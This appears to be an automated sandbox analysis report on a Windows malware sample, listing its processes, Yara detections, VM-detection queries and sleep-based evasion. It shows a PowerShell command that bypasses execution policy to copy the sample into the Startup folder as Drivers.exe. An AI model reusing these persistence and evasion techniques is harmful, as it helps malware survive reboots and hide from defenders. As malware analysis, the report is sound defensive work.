Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Process created: C:\Users\user\Desktop\NKPhba0VZI.exe C:\Users\user\Desktop\NKPhba0VZI.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: NKPhba0VZI.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NKPhba0VZI.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: RunPE.pdb source: NKPhba0VZI.exe, 00000001.00000002.209196388.0000000003051000.00000004.00000001.sdmp, Drivers.exe, 0000000A.00000002.296374394.0000000002B68000.00000004.00000001.sdmp

                      Data Obfuscation:

                      Yara detected Beds Obfuscator
                      Source: Yara match | File source: 0000000A.00000002.301353554.0000000005100000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.213095995.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NKPhba0VZI.exe PID: 6112, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: Drivers.exe PID: 6520, type: MEMORY
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.56b0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.4125d70.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3b9f940.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.5100000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3c05d70.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.4125d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3b9f940.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.3c05d70.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.40bf940.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.56b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.Drivers.exe.5100000.9.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 1.2.NKPhba0VZI.exe.40bf940.4.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Code function: 1_2_00D3960F push es; retf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_075469E0 push es; ret
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Code function: 5_2_0086960F push es; retf
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Code function: 5_2_00D0E472 push 8BFFFFFFh; retf
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Code function: 5_2_00D17A37 push edi; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | Code function: 10_2_0074960F push es; retf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_04C612A1 push es; ret
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | Code function: 20_2_009D960F push es; retf
                      Source: initial sample | Static PE information: section name: .text entropy: 7.99096434579
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe

                      Boot Survival:

                      Drops PE files to the startup folder
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe\:Zone.Identifier:$DATA
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Yara detected Beds Obfuscator
                      Source: Yara matchFile source: 0000000A.00000002.301353554.0000000005100000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.213095995.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NKPhba0VZI.exe PID: 6112, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 6520, type: MEMORY
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.56b0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.4125d70.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3b9f940.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.5100000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3c05d70.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.4125d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3b9f940.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3c05d70.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.40bf940.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.56b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.5100000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.40bf940.4.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2528
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 373
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWindow / User API: threadDelayed 5577
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWindow / User API: threadDelayed 4199
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5293
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1912
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWindow / User API: threadDelayed 3617
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWindow / User API: threadDelayed 6183
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe TID: 6116Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5872Thread sleep count: 2528 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5872Thread sleep count: 373 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4744Thread sleep count: 48 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5408Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe TID: 6056Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe TID: 6060Thread sleep count: 5577 > 30
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe TID: 6060Thread sleep count: 4199 > 30
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exe TID: 6056Thread sleep count: 35 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 6560Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep count: 5293 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6908Thread sleep count: 1912 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7140Thread sleep count: 42 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6404Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7148Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 6408Thread sleep time: -23980767295822402s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 6412Thread sleep count: 3617 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 6412Thread sleep count: 6183 > 30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe TID: 6408Thread sleep count: 44 > 30
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: powershell.exe, 00000002.00000002.268373167.0000000004752000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                      Source: NKPhba0VZI.exe, 00000005.00000002.472580653.0000000000FC1000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllws\system32;C:\Windows;C:\Windows\Syrr
                      Source: powershell.exe, 00000002.00000002.268373167.0000000004752000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D07880 LdrInitializeThunk,
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Bypasses PowerShell execution policy
                      Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\NKPhba0VZI.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess created: C:\Users\user\Desktop\NKPhba0VZI.exe C:\Users\user\Desktop\NKPhba0VZI.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'Powershell.exe' -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe'
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe
                      Source: NKPhba0VZI.exe, 00000005.00000002.473807628.00000000016D0000.00000002.00000001.sdmp, Drivers.exe, 00000014.00000002.472360748.00000000017B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: NKPhba0VZI.exe, 00000005.00000002.473807628.00000000016D0000.00000002.00000001.sdmp, Drivers.exe, 00000014.00000002.472360748.00000000017B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: NKPhba0VZI.exe, 00000005.00000002.473807628.00000000016D0000.00000002.00000001.sdmp, Drivers.exe, 00000014.00000002.472360748.00000000017B0000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: NKPhba0VZI.exe, 00000005.00000002.473807628.00000000016D0000.00000002.00000001.sdmp, Drivers.exe, 00000014.00000002.472360748.00000000017B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Users\user\Desktop\NKPhba0VZI.exe VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Users\user\Desktop\NKPhba0VZI.exe VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
